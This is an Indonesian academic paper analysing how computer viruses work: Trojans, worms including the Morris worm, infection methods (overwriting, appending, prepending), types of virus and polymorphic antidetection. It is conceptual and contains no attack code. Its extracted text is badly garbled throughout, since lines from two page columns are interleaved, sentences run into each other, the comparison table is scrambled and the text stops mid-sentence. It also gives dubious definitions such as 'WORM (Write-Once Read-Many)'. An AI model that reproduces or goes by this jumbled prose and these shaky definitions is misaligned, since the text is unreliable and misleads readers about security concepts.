15
Analisis Cara Kerja Sistem Infeksi Virus Komputer
Petrus Dwi Ananto P., SKom., MMSI.
I.
ABSTRAKSI
Virus komputer disebut sebagai virus karena mempunyai kemiripan dengan perilaku virus yang
sesungguhnya di jagad biologi, terutama cara penyebarannya dari satu komputer ke komputer lain. Virus
komputer, harus menumpang pada sebuah program atau dokumen supaya dapat tereksekusi. Jika program atau
dokumen ini dijalankan, maka virus sudah “dibukakan jalan” untuk mengeinfeksi program atau dokumen lain. Hal
ini serupa dengan virus dalam jagad biologi yang harus menumpang pada sel makhluk hidup lain guna
kelangsungan hidupnya. Dan dalam aksi menumpangnya ini, virus sekaligus juga membuat induk semangnya
menjadi sakit.
Setiap virus komputer mempunyai beberapa rutin tertentu untuk menjamin kelangsungan hidupnya.
Secara umum, ada tiga rutin yang menjadi komponen dasar pembentuk virus, yaitu rutin pencari, pengganda dan
anti deteksi. Setiap rutin tersebut mempunyai tugas dan fungsi masing-masing yang saling mendukung satu
dengan lainnya.
Sebuah virus komputer memerlukan daftar nama-nama file yang ada dalam suatu direktori untuk
mengenali file yang menjadi targetnya.Kemudian dengan kemampuan replikasi (menggandakan diri), baik
dengan menimpa di atasnya (overwrite) atau menambahkan (appending) kode programnya ke program induk
(host) akan ikut tereksekusi bersamaan dengan eksekusi program induknya. User biasanya tidak menyadari
adanya aktivitas virus saat virus menggandakan diri dan hanya menyadari saat virus melakukan aksinya.
Kata kunci : virus, virus komputer, program, user
II.
PENDAHULUAN
dan dengan internet pula kita bisa berkomunikasi
dengan semua orang yang ada di seluruh dunia
1.1. Identifikasi Masalah
(peranan internet sebagai jaringan komunikasi
Dewasa ini, perkembangan teknologi telah
dunia). Tapi sayang, internet tidak selalu berisi
membuat banyak perubahan-perubahan penting
informasi-informasi yang kita inginkan. Internet juga
dalam
berisi
kehidupan
manusia
sehari-hari.
Salah
malware
atau
program
komputer
yang
satunya adalah perkembangan teknologi komputer
cenderung merusak, seperti virus-virus komputer,
dan internet yang membuat orang semakin mudah
yang dapat membahayakan sistem operasi yang
untuk mendapatkan informasi yang diinginkan.
ada di komputer kita. Cukup banyak orang yang
Dengan hanya berpakaian kaos dan celana pendek
memiliki persepsi yang salah mengenai virus
sambil minum teh atau kopi dan makan gorengan,
komputer
kita bisa mendapatkan informasi secara detail
menjadi ketakutan secara berlebihan terhadap virus
mengenai berita-berita internasional.
komputer.
Internet merupakan salah satu media yang
paling digemari setiap orang
sehingga
tidak
Sebagian
jarang
besar
dari
dari
mereka
mereka
beranggapan bahwa jika komputer mereka sudah
untuk mendapatkan
terinfeksi virus komputer maka komputer mereka
informasi yang dibutuhkan. Hampir semua informasi
sudah “divonis” rusak dan semua data yang
bisa kita dapatkan di internet (peranan internet
tersimpan dalam komputer tersebut akan hilang dan
sebagai perpustakaan terlengkap di seluruh dunia)
tidak bisa “terselamatkan” lagi.
16
yang
1.2. Identifikasi Masalah
terus
bermunculan
seiring
dengan
perkembangan internet itu sendiri.
Berdasarkan dari uraian
di atas, ada
Menurut
Palani
Murugappan,
internet
beberapa masalah yang dapat diidentifikasi, antara
didefinisikan sebagai berikut :
lain :
Internet
1. Bagaimana virus komputer bisa menjadi hal
jaringan yang dihubungkan oleh kabel dan siap
yang begitu menakutkan bagi para pengguna
terhubung dengan satelit, dimana hampir semua
komputer ?
jaringan tersebut secara instan terhubung satu
2. Bagaimana peranan internet dalam penyebaran
virus komputer ?
adalah
sebuah
jaringan
dari
banyak
dengan yang lain. Internet tidak mempunyai batas,
berkembang secara eksponensial dan merupakan
3. Apa yang dapat dilakukan untuk memperkecil
jaringan komputer terbesar di dunia.
kemungkinan terinfeksi virus komputer ?
Sedangkan Ahmad Bustami mengatakan
1.3. Tujuan Analisis
bahwa Internet merupakan jaringan global yang
Adapun tujuan dari analisis ini adalah untuk
mengetahui
seberapa
jauh
dari
ratusan
bahkan
ribuan
komputer
dapat
termasuk jaringan-jaringan lokal tersebut. Komputer-
dan
komputer ini terhubung menjadi satu melalui saluran
yang
telepon. Dilihat dari sisi teknis, internet bisa
berlebihan terhadap virus komputer yang banyak
didefinisikan sebagai rajanya jaringan (networks of
tersebar melalui internet.
networks).
membahayakan
pengoperasian
mampu
mengurangi
untuk
virus
terdiri
komputer
ketakutan
Sedangkan
dari
sisi
pengetahuan,
internet merupakan sebuah perpustakaan besar
III.
TINJAUAN PUSTAKA
dengan
segudang
informasi-informasi
lengkap,
bahkan internet bisa juga didefinisikan sebagai
2.1. Internet
Internet mulai komersial dan berkembang
shopping center terbesar di seluruh dunia bagi
orang-orang yang suka berbelanja. (1999)
sangat pesat sejak tahun 1990. Sebelumnya,
internet sudah dikenal di kalangan akademik dan
2.2. Trojan Horse
pusat-pusat penelitian. Tapi sekarang, semua orang
Virus dan worm adalah ancaman terbesar
telah mengenal internet. Internet sebagai jaringan
bagi dunia bisnis, dalam kaitannya dengan kerugian
komputer global telah terbukti dapat mempermudah
uang dan data yang diakibatkannya, sedangkan
pemakainya, baik dalam berkomunikasi maupun
Trojan adalah ancaman terbesar bagi sistem
dalam pertukaran informasi. Banyak fasilitas yang
keamanan. Adapun, virus bekerja merusak data
ditawarkan oleh internet, antara lain e-mail atau
sedangkan trojan mengumpulkan data yang ada
electronic mail (untuk berkirim dan menerima surat
dalam komputer korbannya. Virus memerlukan
secara elektronik), FTP atau File Transfer Protocol
banyak instruksi dan bekerja melakukan semua
(untuk melakukan transfer data atau file dari satu
instruksi yang telah diprogramkan dalam dirinya.
komputer ke komputer lain), Web (untuk mengakses
Sebaliknya,
informasi-informasi), dan fasilitas-fasilitas lainnya
instruksi, hanya untuk membuka backdoor komputer
trojan
korban. Setelah
hanya
backdoor
memerlukan
sedikit
ini terbuka, berarti
17
komputer korban, secara otomatis, akan menjadi
milik dari pengirim trojan tersebut.
Trojan-server
terbuka
dalam
membuat
komputer
beberapa
target.
Port
port
dapat
Kata trojan berasal dari legenda masyarakat
diasumsikan sebagai pintu. Saat pintu telah terbuka
Yunani. Dalam legenda ini diceritakan bahwa ada
lebar, maka orang lain dapat bebas keluar-masuk.
satu pasukan yang menyerbu kota Troy yang
Demikian pula halnya dengan komputer target. Saat
dikelilingi oleh sebuah tembok besar, tinggi dan
trojan-server telah membuka port dalam komputer
susah untuk ditembus. Berbagai usaha dilakukan
target, maka orang lain dapat bebas keluar-masuk,
untuk menembus tembok besar tersebut, tapi selalu
tanpa sepengetahuan user komputer target. Sekali
gagal total. Akhirnya dilakukan perubahan taktik dan
saja trojan-server telah membuka port, maka port
disiapkan siasat baru, yaitu dengan membuat
tersebut selamanya tidak akan pernah ditutup oleh
sebuah kuda kayu yang besar dan diisi dengan
trojan sehingga orang lain memiliki banyak waktu
pasukan
untuk
terbaik.
ditempatkan
di
Kuda
luar
kayu
gerbang
ini
kemudian
sebagai
mengendalikan
komputer
target
dan
tanda
mengetahui segala aktivitasnya. Trojan-server dan
penawaran perdamaian. Trojan (penduduk kota
trojan-client dapat diasumsikan sebagai televisi dan
Troy) merasa senang mendapat hadiah tersebut
remote control-nya. Saat televisi telah dinyalakan,
dan membawanya masuk tanpa curiga sedikitpun.
maka orang dapat dengan laluasa mengganti-ganti
Saat malam tiba, pasukan terbaik yang sejak siang
program acara melalui tombol-tombol yang ada
berada dalam kuda kayu tersebut, kemudian keluar
dalam remote control.
dan menyerang penjaga pintu gerbang agar dapat
membuka pintu gerbang sehingga pasukan yang
berada
di
luar
dapat
masuk
dan
2.3. Worm
kemudian
Banyak artikel yang menterjemahkan istilah
menyerang dari dalam. Akhirnya, kota Troy dapat
worm sebagai cacing. Makhluk yang satu ini
dikuasai.
memang tepat disebut sebagai cacing. Makhluk
Seth Fogie dan Cyrus Peikari dalam buku
hidup yang disebut cacing ini memiliki beberapa
Windows Internet Security : Protecting Your Critical
kelebihan,
Data,
komputer
dengan bebas, hidup dengan memakan makanan
merupakan sebuah program yang berisi malicious
yang tersedia di sekitarnya, dan yang paling utama
code yang bersembunyi pada program lain.” (2002:
dan khas, adalah berkembang biak dengan cara
224)
segmentasi.
menerangkan
bahwa
“Trojan
Setiap trojan bekerja sebagai client-server.
Trojan-server
diinstal
pada
komputer
target
diantaranya
Dengan
adalah
cara
dapat
bergerak
segmentasi
inilah
perkembangbiakan cacing menjadi sangat pesat
dibandingkan makhluk hidup lainnya.
sedangkan trojan-client diinstal pada komputer
Menurut Seth Fogie dan Cyrus Peikari,
orang yang akan mengendalikan komputer target.
WORM
Orang tersebut menggunakan program trojan-client
sebagai berikut : Worm adalah sebuah program
untuk melakukan koneksi dengan komputer target.
yang dapat berjalan sendiri dan akan menggunakan
Saat
dalam
sumber daya yang ada dalam program induk untuk
komputer target, orang tersebut dapat leluasa
bertahan hidup (menyebabkan daya hidup worm
keluar-masuk melalui backdoor yang terbuka.
lebih
trojan
telah
membuka
backdoor
(Write-Once
lama
daripada
Read-Many)
virus)
didefinisikan
sehingga
dapat
18
menyebar luas ke komputer lain tanpa adanya
campur tangan manusia. (2002: 222)
Tidak diragukan lagi bahwa worm memang
memiliki kelebihan-kelebihan yang juga dimiliki oleh
cacing. Fleksibel dalam bergerak, dapat bertahan
Worm dapat menyebarkan dirinya sendiri
hidup lebih lama, dan dapat mereplikasi dirinya
kepada komputer-komputer berbeda yang berada
sendiri sehingga menyebabkan banyak masalah
dalam suatu jaringan. Worm dapat menemukan
dalam jaringan. Komunikasi dalam jaringan menjadi
jalan menuju komputer lain dengan menggunakan
suatu
sumber daya dari komputer induk. Dengan kata lain,
berkembang dan menyebar dari satu komputer ke
jika komputer seseorang terhubung melalui jaringan
komputer lain. Karena itulah, penyebaran worm
komputer
menjadi lebih cepat, apalagi didukung oleh adanya
lain,
maka
worm
dapat
mendekati
jalan
komputer itu dan secara otomatis mereplikasi
komunikasi
dirinya
komputer
sendiri,
tanpa
sepengetahuan
orang
tersebut.
tol
bagi
jaringan.
yang
worm
yang
Jadi,
berusaha
semakin
terhubung
dengan
banyak
jaringan,
kemungkinan, semakin banyak komputer yang
Worm mirip dengan virus, yaitu dapat
dapat terinfeksi oleh worm.
menghapus dan memodifikasi file. Bedanya, worm
memiliki tingkat penyebaran yang lebih cepat
2.4.
Virus
daripada virus sehingga menjadi lebih berbahaya
Serangan virus komputer akhir-akhir ini
daripada virus. Sebagai contoh adalah Worm
terlihat
Morris. Worm ini dibuat pada tanggal 2 November
menggunakan
1988 oleh seorang mahasiswa berumur 23 tahun
mengecoh antivirus yang ada dalam komputer user.
dari suatu universitas. Beberapa saat setelah worm
Selain itu, mulai terdapat indikasi penyebaran virus
ini masuk ke dalam jaringan komputer yang ada di
untuk
universitas tersebut langsung mereplikasi dirinya
sebenarnya telah muncul sejak era 1980-an. Tetapi
sendiri
password
tingkat penyebaran yang semakin cepat dan luas
komputer tersebut. Setelah sukses masuk ke dalam
terjadi di awal 1990-an, yaitu ketika internet mulai
komputer tersebut dan menginfeksinya, kemudian
dimasyarakatkan. Dengan menumpang di dalam isi
worm ini akan meng-crack password komputer lain
e-mail ataupun situs web, virus semakin leluasa
yang terhubung dengan komputer tersebut dan
mengobrak-abrik jaringan komputer.
untuk
kemudian
meng-crack
semakin
gencar.
berbagai
kepentingan
Para
trik
pembuatnya
supaya
komersial.
Program
mampu
virus
selanjutnya menginfeksinya. Begitulah seterusnya
kegiatan crack password dan infeksi berlangsung
2.4.1.
Definisi Virus Komputer
terus sampai seluruh komputer yang ada dalam
Makhluk ini disebut sebagai virus karena
jaringan tersebut terinfeksi worm ini, tanpa dapat
mempunyai kemiripan dengan perilaku virus yang
diketahui aktivitasnya. Meskipun Worm Morris tidak
sesungguhnya di jagad biologi, terutama cara
berisi
tapi
penyebarannya dari satu komputer ke komputer
memang
lain. Virus komputer, harus menumpang pada
dipergunakan untuk aktivitas ribuan mahasiswa,
sebuah program atau dokumen supaya dapat
menjadi tidak berfungsi dan diperkirakan kerugian
tereksekusi.
yang diderita universitas tersebut mencapai $
dijalankan, maka virus sudah “dibukakan jalan”
100.000 sampai $10.000.000.
untuk mengeinfeksi program atau dokumen lain. Hal
kode-kode
akibatnya
semua
yang
dapat
komputer
merusak,
yang
Jika
program
atau
dokumen
ini
19
ini serupa dengan virus dalam jagad biologi yang
Virus komputer adalah program yang menulari
harus menumpang pada sel makhluk hidup lain
program
guna kelangsungan hidupnya. Dan dalam aksi
memodifikasi mereka sedemikian rupa sehingga
menumpangnya ini, virus sekaligus juga membuat
sebuah salinan dari virus ini dapat tercipta.
induk semangnya menjadi sakit.
(Pamela Kane, 1995: 5)
Tabel 2.1. Perbandingan Antara Virus Biologi
dan Virus Komputer
komputer
lain
dengan
cara
Virus komputer adalah serangkaian instruksi
komputer yang menumpang pada program
resmi atau mengganti instruksi program resmi
Ciri
Ukuran
Komposisi
Infeksi
Siklus
hidup
Penyebar
an
Musuh
utama
Akibat
Reproduk
si
Antideteks
i
Virus Biologi
Virus
Komputer
100 – 300
nm
Berisi
protein
Sel
makhluk
hidup
20 – 45
menit
1024 byte –
5 KB
Berisi
malicious
code
File,
program
Hampir
sama
dengan
proses
instalasi
software
aplikasi
Butuh
intervensi
manusia
Butuh
intervensi
makhluk
hidup
Antibodi
Menimbulk
an penyakit
dan
Antivirus
kerusakan
Memanipul
sel
asi sistem
Dengan
dan
menciptaka
berpotensi
n
kode
untuk
genetik
merusak
Dengan
Evolusi
melakukan
bentuk dan
replikasi
kemampua
kode
n
programnya
Polymorphi
c, enkripsi,
antidebugging,
stealth
untuk kemudian membuat salinannya ke dalam
program resmi tersebut. (Ibid.: 7)
Virus komputer adalah sebuah program yang
melakukan duplikasi dirinya sendiri di dalam
sistem komputer yang dimasukinya dan memiliki
potensi yang besar untuk melakukan manipulasi
terhadap
Virus komputer adalah sebuah kode komputer
yang dapat dijalankan dan berukuran kecil
dengan kemampuan memperbanyak diri, baik
dengan cara menempelkan sebagian atau
seluruh
sebuah
seminar
yang
atau
aplikasi
program,
dan
tidak
diinginkan.
(www.bintek.depkeu.go.id)
Virus komputer adalah sebuah program yang
mereproduksi kodenya sendiri ke dalam file
eksekusi lain, tanpa sepengetahuan dari user,
sedemikian rupa sehingga kode virus tersebut
akan tereksekusi saat eksekusi file yang telah
terinfeksi tersebut. (www.bintek.depkeu.go.id)
Virus komputer diartikan sebagai suatu program
yang menginfeksi suatu file dan dapat secara
otomatis menyisipkan salinan dirinya sendiri
file
atau
komputer
lain.
(http://freehost16.websamba.com/pondokpelangi/)
mengenai
“Computer Security”, bulan Nopember 1983. Hingga
file
mengakibatkan komputer melakukan hal-hal
Julukan “virus” sendiri diberikan oleh Len
dalam
tersebut.
(www.bintek.depkeu.go.id)
kepada
Adleman,
sistem
Virus komputer adalah suatu program komputer
saat ini, virus komputer memiliki banyak definisi,
yang menyebar dari satu sistem ke sistem yang
antara lain :
lain dan akhirnya membuat fungsi komputer
20
tersebut tidak dapat didesain lagi. Setiap kode
virus
hasil
salinan
tanpa
Secara tidak langsung, para pembuat virus
bergantung pada virus aslinya. (David Frost, Ian
menganut pepatah yang mengatakan “Small is
Beagle, Chris Frost, 1991: 3)
beautiful” sehingga ukuran virus dibuat sekecil
Virus komputer adalah sebuah program yang
mungkin.
memasukkan dirinya sendiri ke dalam satu atau
dibandingkan dengan kebanyakan program sistem
lebih file dan kemudian menjalankan beberapa
komputer. Sebenarnya ukuran virus yang kecil ini
kegiatan. (Matt Bishop, 2003: 616)
bukan hanya sekedar untuk keindahan, tapi justru
Virus komputer adalah sebuah program yang
untuk menghindari kecurigaan user terhadap infeksi
dapat melakukan replikasi, berkembang biak
virus.
dan melakukan infeksi dari satu program ke
menyadari jika ukuran file mereka mengalami sedikit
program lain, user ke user, komputer ke
penambahan (hanya beberapa byte saja). Selain itu,
komputer, dan jaringan ke jaringan. (Frederick
ukuran yang kecil membuat virus cepat untuk di-
B. Cohen, 1994: 28)
copy ke file/program lain. Proses copy yang cepat
VIRUS (Vital Information Resources Under
membuat proses kerja program yang lain menjadi
Siege)
tidak terganggu.
adalah
mampu
program
bekerja
2.4.2.1. Ukuran
yang
melakukan
Ukuran
Kebanyakan
virus
sangatlah
user
tidak
kecil
akan
bila
pernah
replikasi dirinya sendiri dengan menginfeksi
Dari semua bahasa pemrograman yang
program lain. (Peter Norton & Paul Nielsen,
ada, Assembler merupakan bahasa pemrograman
1992: 11)
yang handal dan paling baik digunakan untuk
Dari beberapa definisi virus di atas, ada dua
membuat virus dengan ukuran yang kecil. Biasanya
kata kunci mengenai definisi dari virus komputer,
virus dinamai menyertakan besar penambahan
yaitu program dan replikasi. Dari kedua kata kunci
ukurannya, misalnya virus Die Hard 4000 (artinya
itu, virus komputer dapat didefinisikan sebagai
virus Die Hard akan menambah ukuran file yang
sebuah program berukuran kecil yang memiliki
diinfeksi dengan besar 4000 byte).
kemampuan replikasi (menggandakan diri), baik
dengan menimpa di atasnya (overwrite) atau
2.4.2.2. Metode Infeksi
menambahkan (appending) kode programnya ke
Ciri
utama
dari
sebuah
virus
adalah
program induk (host) dan akan ikut tereksekusi
kemampuannya dalam mereplikasi dirinya sendiri ke
bersamaan dengan eksekusi program induknya.
dalam file/program lain. Replikasi ini dilakukan
User biasanya tidak menyadari adanya aktivitas
dengan
virus saat virus menggandakan diri dan hanya
file/program lain yang akan dijadikan sebagai
menyadari saat virus melakukan aksinya.
file/program induk (host). Ada banyak cara yang
cara
melakukan
infeksi
ke
dalam
dilakukan oleh virus dalam menginfeksi program
induk, antara lain overwriting, appending, dan
2.4.2.
Karakteristik Virus Komputer
prepending.
Setiap virus memiliki karakteristik tersendiri.
Berikut ini adalah karakter-karakter virus yang
membedakan virus yang satu dengan yang lainnya,
yaitu ukuran, metode infeksi, dan TSR.
A. Overwriting
Metode ini merupakan metode yang sudah
kuno, tapi memiliki daya rusak yang cukup besar
21
karena mengganti sebagian isi dari program yang
ukuran file yang terinfeksi menjadi tambah besar.
diinfeksi oleh virus. Virus akan meng-copy tubuhnya
Saat program terinfeksi virus dijalankan, kode virus
ke program induk, sehingga program induk yang
akan tereksekusi terlebih dahulu kemudian diikuti
terinfeksi
Akibatnya
dengan program induk. Program antivirus akan lebih
program ini tidak dapat berjalan dengan baik,
mudah mengembalikan program yang terinfeksi
bahkan tidak bisa lagi dikembalikan ke kondisi
virus yang menggunakan metode ini. Hapus bagian
semula oleh program antivirus. Dengan metode ini
awal program yang berisi virus dan setelah itu
ukuran file yang terinfeksi tidak berubah.
program akan kembali seperti semula.
tersebut
menjadi
rusak.
Sebelum
Sebelum
infeksi
Sesudah
infeksi
Sesudah
infeksi
infeksi
Program induk
Virus
Program induk
Virus
Gambar 2.2. Metode Infeksi Dengan Prepending
Gambar 2.1. Metode Infeksi Dengan Overwritting
B. Appending
Ini merupakan metode penginfeksian yang
2.4.2.3.
TSR (Terminate and Stay Resident)
lebih maju dan sedikit “baik hati” dengan tidak
TSR (Terminate and Stay Resident) adalah
mengganti isi dari program yang akan diinfeksi oleh
program komputer yang tinggal di memori komputer
virus. Virus meng-copy tubuhnya dengan cara
dan akan tetap ada sampai komputer dimatikan..
menambahi
tidak
Program ini meliputi utility pop-up, software jaringan,
kecil
dan sebagian besar virus komputer. Jika program
program virus berada di awal program induk dan
tersebut adalah virus komputer, maka lebih baik
menggeser sedikit ke belakang program induk.
lakukan booting panas (Ctrl-Alt-Del) agar virus yang
Karena tidak mengubah isi dari program yang
berdiam di memori menjadi hilang.
dengan
program
meniban
induk
(appending)
(overwriting).
Sebagian
terinfeksi, maka program yang terinfeksi tersebut
tetap dapat berjalan normal, tetapi ukuran file
menjadi bertambah besar. Dengan metode ini,
kemungkinan
program
antivirus
masih
2.4.3.
Tanda-Tanda
Keberadaan
Virus
Komputer
bisa
Ada banyak cara untuk mendeteksi keberadaan
mengembalikan program yang terinfeksi ke kondisi
virus pada sistem komputer, diantaranya adalah
semula, ketika program masih bersih dari virus.
sebagai berikut :
1. Program tidak berjalan secara normal, diikuti
Sebelum
infeksi
Sesudah
infeksiProgram induk
pesan-pesan
Virus
Gambar 2.2. Metode Infeksi Dengan Appending
C. Prepending
Metode penginfeksian
error,
atau
sesekali
disertai
animasi (walaupun menarik).
2. Berubahnya volume disk.
3. File / program yang hilang secara misterius.
ini mirip dengan
appending, hanya saja virus meng-copy tubuhnya
pada bagian awal program induk. Hal ini membuat
4. Ukuran file yang dieksekusi menjadi berubah
tanpa sebab yang diketahui.
5. Data file berubah tanpa sebab yang diketahui.
22
6. Penurunan jumlah memori tersedia walaupun
Dari semua bahasa pemrograman yang
komputer tidak sedang menjalankan program
ada, Assembler merupakan bahasa pemrograman
komputer.
yang memiliki kehandalan yang paling baik untuk
7. Akses disk tampak berlebihan walaupun untuk
hal-hal yang sederhana.
melalui Assembler akan menghasilkan virus dengan
8. Aktifitas sistem secara keseluruhan berjalan
sangat
lambat
dibutuhkan
(untuk
waktu
yang
digunakan dalam membuat virus. Virus yang dibuat
eksekusi
lebih
program
lama
dari
biasanya).
ukuran yang sangat kecil (hanya beberapa byte
saja) sehingga proses infeksinya menjadi lebih
cepat dan mampu mengindari kecurigaan user
terhadap aktifitas infeksinya. Selain itu, karena
9. Lampu disk menyala tanpa adanya keterangan
apa-apa.
kedekatannya
dengan
bahasa
mesin,
maka
pembuat virus akan lebih mudah melakukan hampir
seluruh manipulasi yang mana hal ini tidak selalu
2.4.4.
Jenis-Jenis Virus Komputer
Ternyata
virus
yang
banyak
dapat dilakukan oleh virus jenis lain, terutama dalam
beredar
hal
manipulasi
interupsi-interupsi
memiliki jenis yang berbeda-beda. Berikut ini akan
berhubungan
langsung
dibahas jenis-jenis virus menurut taknik pembuatan,
hardware sistem komputer.
dengan
DOS,
yang
software
dan
infeksi yang dilakukan, dan teknik antideteksi.
B. Virus Macro
2.4.4.1.
Berdasarkan Teknik Pembuatan
Dilihat dari teknik pembuatannya, ada tiga
Salah satu jenis virus yang banyak beredar
adalah virus macro. Macro adalah sebuah tool
jenis virus yang dapat didefinisikan, yaitu virus yang
perintah
yang
membutuhkan
sebuah
program
dibuat dengan compiler, virus macro, dan virus
interpretasi untuk eksekusi. Hampir semua macro,
script.
yang banyak dikenal, digunakan dalam produkproduk Microsoft Office. Pembuat virus macro
A. Virus yang Dibuat dengan Compiler
Compiler berfungsi untuk mengubah suatu
memanfaatkan bahasa pemrograman yang ada
dalam Microsoft Office, yaitu Visual Basic for
kode bahasa pemrograman tertentu menjadi format
Application (VBA). VBA merupakan
.EXE dan .COM. Dengan format ini, suatu file dapat
mudah digunakan, karena VBA dapat membantu
langsung dieksekusi. Virus yang pertama kali
user
muncul di dunia komputer adalah virus yang dibuat
Microsoft Office. Sebagai contoh, VBA dapat
dengan compiler. Bahkan sampai sekarang pun
digunakan untuk membuat program template, yang
virus jenis ini berkembang dengan pesat.
menyediakan user dengan format-format dokumen
Virus dapat dibuat dengan berbagai macam
dalam
melakukan
aktivitasnya
tool yang
dengan
yang siap pakai. Tapi saat sebuah virus telah
bahasa pemrograman, seperti Assembler, Pascal,
memanfaatkan
fasilitas
VBA,
maka
bahaya
C++, dan sebagainya. Agar virus yang telah dibuat
kerusakan mulai mengancam. Salah satu virus
ini dapat langsung dieksekusi, maka perlu dilakukan
macro yang pernah membuat heboh adalah virus
compile terlebih dahulu. TASM atau MASM adalah
Melissa. Virus ini memanfaatkan Outlook (produk
compiler Assembler, Turbo Pascal untuk Pascal,
Microsoft yang bisa berhubungan dengan Microsoft
dan Borland C++ untuk C++.
Office). Virus ini melakukan reproduksi sendiri dan
23
mampu menyebar dengan cara mengirimkan dirinya
menginfeksi. Apabila pada boot sector terdapat
sendiri melalui address book e-mail kepada user
suatu program yang mampu menyebarkan diri dan
lain. Si penerima e-mail tidak akan curiga kepada si
mampu tinggal di memory selama komputer bekerja,
pengirim e-mail (karena pengirim memang telah
maka program tersebut dapat disebut virus.
dikenal) dan kemudian membukanya sehingga ia
Virus ini biasanya menginfeksi boot sector
menjadi terinfeksi. Aktivitas ini terus berlangsung
harddisk atau floppy disk dan kemudian melakukan
sampai semua nama yang terdapat dalam address
loading
book e-mail si pengirim akan terkirimkan semua.
dinyalakan. Virus boot sector dapat meng-copy
Akibatnya, jalur e-mail menjadi sibuk bahkan server
dirinya sendiri dari disk ke disk, biasanya dari floppy
e-mail menjadi down.
disk ke harddisk kemudian kembali lagi ke floppy
ke
memori
sesaat
setelah
komputer
disk. Brain adalah contoh virus boot sector pertama
C. Virus Script
yang menyerang komputer.
Virus script biasanya sering didapat dari
Tempat
terbaik
bagi
virus
untuk
internetkarena kelebihannya yang fleksibel dan bisa
menduplikasi diri sendiri adalah suatu tempat pada
berjalan pada saat terkoneksi dengan internet. Virus
harddisk yang dikenal sebagai Master Boot Record
jenis ini biasanya menumpang pada fileHTML (Hype
(MBR). MBR adalah bagian dari drive
Text
menyediakan
Markup
Language)
yang
dibuat
dengan
informasi
sebelum
yang
komputer
menggunakan fasilitas script seperti Javascript,
melakukan start-up. Sebagai contoh, jika seseorang
VBScript,maupun gabungan antara script yang
mempunyai partisi dan drive yang berbeda-beda
mengaktifkan
pada komputernya, maka MBR akan memberikan
program
Active-X
dari
Microsoft
Internet Explorer.
informasi tentang ukuran dan struktur dari partisi
Virus script berbeda dengan virus macro.
dan drive yang ada. Jika virus MBR menyerang,
script
berbagai
maka virus tersebut akan menghapus MBR. Tidak
lingkungan produk. Bahasa pemrograman umum,
ada lagi informasi yang diberikan mengenai ukuran
seperti VBScript, dapat menjalankan rutin-rutin
dan struktur dari partisi dan drive yang ada di dalam
dalam Microsoft Outlook e-mail client, web-server
harddisknya. Artinya, semua data yang ada di
dan web-browser. Contoh virus jenis ini adalah
dalam harddisk orang tersebut menjadi tidak ada,
PHP.Pirus, VBS.Kalamar, HTML.Internal.
karena tidak ada lagi yang dapat menunjukkan
Virus
dapat
berjalan
dalam
lokasi tempat data-data tersebut berada.
2.4.4.2. Berdasarkan Infeksi yang Dilakukan
Virus MBR sulit untuk dideteksi. Hal ini
Jika dilihat dari infeksi yang dilakukan, maka
disebabkan karena virus
ini bekerja sebelum
virus dapat dibedakan menjadi virus boot sector,
program
virus file, virus sistem, virus multi-partite, dan virus
antivirus. Karena itu, ketika program antivirus mulai
registry windows.
memeriksa file-file yang ada di dalam komputer,
lain
beroperasi,
termasuk
program
virus MBR dapat mengalihkan pemeriksaan dan
A. Virus Boot Sector
Virus
Boot
membuat diri seolah-olah merupakan program yang
Sector
adalah
virus
yang
memanfaatkan gerbang hubungan antara komputer
dan media
penyimpan
sebagai
tempat untuk
legal.
Contoh dari virus jenis ini adalah virus WXZ
(menginfeksi boot record dan floppy disk), virus V-
24
sign
(menginfeksi
MBR)
dan
virus
Stoned
E. Virus Registry Windows
(menginfeksi MBR dan floppy disk).
Virus ini menginfeksi sistem operasiyang
menggunakan
B. Virus File
Windows
95/98/NT
danbiasanya
akan melakukan infeksi dan manipulasi pada bagian
Virus
filemerupakan
memanfaatkan
suatu
virus
fileyang
dapat
yang
diproses
registry Windows,sebab registry adalah tempat
menampung
seluruh
informasi
komputer
baik
langsung pada editor DOS, seperti fileberekstensi
hardware maupun software,sehingga setiap kali
.COM, .EXE, .BAT, .OVL, .DRV dan beberapa file
seseorang menjalankan Windowsmaka virus akan
lainnya. Untuk menyebarkan dirinya, biasanya, virus
dijalankan oleh registry tersebut. Contoh virus ini
akan
adalah WinREG.
menempelkan
dirinya
di
dalam
file-file
eksekusi sehingga virus akan ikut dieksekusi saat
file tempat virus tersebut menumpang, dieksekusi.
2.4.4.3. Berdasarkan Teknik Antideteksi
Biasanya juga, hasil infeksi dari virus ini dapat
Untuk mempertahankan hidup, suatu virus
diketahui dengan berubahnya ukuran file yang
harus
bisa
diinfeksinya. Contoh dari virus ini banyak sekali,
deteksi
antara lain virus Dark Avenger, Dudley, Jerusalem,
mempertahankan hidup. Semakin pandai suatu
dll.
virus menghindari deteksi antivirus, maka semakin
besar
C. Virus Sistem
Virus
semaksimal
antivirus.
waktu
mungkin
Apapun
hidupnya.
menghindari
dilakukan
Teknik
demi
antideteksi
merupakan suatu teknik yang digunakan virus untuk
sistem
merupakan
virus
yang
menghindari deteksi antivirus. Teknik antideteksi
memanfaatkan file-fileyang dipakai untuk membuat
tiap-tiap
suatu
adalah
menghasilkan jenis virus yang berbeda-beda pula,
fileIBMBIO.COM,
seperti virus polymorphic, virus stealth, sparse
sistem
komputer.
fileberekstensi
.SYS,
Contohnya
IBMDOS.COM, atau COMMAND.COM. Contoh dari
virus
sistem
adalah
Lehigh
virus
adalah
berbeda
sehingga
infector, dan virus cavity (spacefiller).
(menginfeksi
A. Virus Polymorphic
COMMAND.COM).
D. Virus Multi-Partite
Virus multi-partite dapat bertindak sebagai
virus boot sector maupun virus file. Virus ini
mempunyai dua kemampuan, yaitu dapat masuk ke
boot
sector
dan juga
dapat masuk
ke file.
Kebanyakan virus modern merupakan virus jenis ini.
Virus code
Deciphering
routine
Enciphered
Virus code
Deciphering
key
Gambar 2.4. Virus Polymorphic dan Enkripsinya
Selain fleksibel juga dianggap mampu bertahan
Virus Polymorphic merupakan sejenis virus
hidup lebih lama bila dibandingkan hanya memiliki
yang mampu mengubah sifat dan karakteristiknya
satu kemampuan saja, masuk ke dalam boot sector
(punya berbagai macam bentuk) setiap kali ia
atau file saja. Contoh virus ini adalah virus Mystic
mereplikasi dirinya dan menginfeksi file-file baru
yang dibuat di Indonesia, Angela, Anthrax.
untuk menyamarkan dirinya supaya tidak mudah
dikenali oleh software antivirus. Maksudnya adalah
25
Selain virus polymorphic yang mengalami
sebagai berikut : setiap kali menginfeksi, virus ini
membuat
kode
enkripsi
yang
berbeda-beda
banyak
peningkatan
populasi
perkomputeran
virus memiliki fungsi yang identik. Hal ini dapat
generatorpolymorphic juga tak luput dari perhatian
dilakukan karena pada setiap proses enkripsi
para
